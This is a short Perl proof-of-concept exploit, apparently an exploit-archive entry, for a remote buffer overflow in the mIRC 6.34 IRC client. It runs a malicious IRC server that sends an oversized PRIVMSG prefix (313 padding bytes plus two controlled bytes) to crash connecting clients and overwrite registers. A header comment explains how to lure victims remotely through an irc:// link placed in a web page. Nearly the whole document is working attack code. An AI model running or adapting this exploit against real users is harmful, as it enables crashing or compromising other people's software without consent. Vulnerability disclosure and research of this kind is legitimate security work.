################################################################################################## # Mirc 6.34 Remote Buffer Overflow # # This poc allow you to own the 2 first EDI & EDX bytes. # # To become remote, add a simple document.location.href=irc://server.com/... in some html page # use IO::Socket;
sub sock() { my $sock=new IO::Socket::INET ( Listen => 1, LocalAddr => 'localhost', LocalPort => 6667, Proto => 'tcp'); die unless $sock;
print " [+]IRC Server started on port 6667 \r\n";
$s=$sock->accept(); $a = "A" x 313; $twobytes = "\x43\x43";
print " [+]Sending pickles\r\n"; print $s ":irc_server.stuff 001 yow :Welcome to the Internet Relay Network yow\r\n"; sleep(1); print $s ":".$a.$twobytes." PRIVMSG yow : /FINGER yow.\r\n"; } while(1) { sock(); print " [+]Mirc should be down now, another little friend comming ?\r\n [+]Server Restarting\r\n"; }